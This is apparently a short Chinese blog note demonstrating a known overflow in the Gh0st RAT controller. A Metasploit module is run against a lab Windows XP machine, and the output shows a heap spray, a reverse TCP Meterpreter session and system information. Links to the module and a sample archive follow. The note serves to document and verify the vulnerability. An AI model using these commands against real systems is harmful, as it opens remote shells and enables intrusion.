前言

漏洞验证在2017年被公开，实际上Gh0st溢出漏洞在2009年时就已被人爆出过多个
可见使用开源C2工具，不见得安全，最好是经过二次修改，单纯做免杀可防不了哦

MSF

Teston WinXP at 2017-09-15
运行Gh0st客户端，然后通过MSF溢出C2客户端机器，即可反向获取攻击者机器权限

msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set RHOST 192.168.1.126
RHOST => 192.168.1.126
msf exploit(gh0st) > run

[*] Started reverse TCP handler on 192.168.1.125:4444 
[*] 192.168.1.126:80 - Trying target Gh0st Beta 3.6
[*] 192.168.1.126:80 - Spraying heap...
[*] 192.168.1.126:80 - Trying command 103...
[*] Sending stage (957999 bytes) to 192.168.1.126
[*] Meterpreter session 1 opened (192.168.1.125:4444 -> 192.168.1.126:1070) at 2017-09-15 16:22:56 +0800
[*] 192.168.1.126:80 - Server closed connection

meterpreter > sysinfo
Computer        : K8ANTI-B2B9B81C
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

EXP

https://github.com/rapid7/metasploit-framework/blob/be66ed8af3c355b1280e1a2bdbe5dd1a74e7bc58/modules/exploits/windows/misc/gh0st.rb

https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip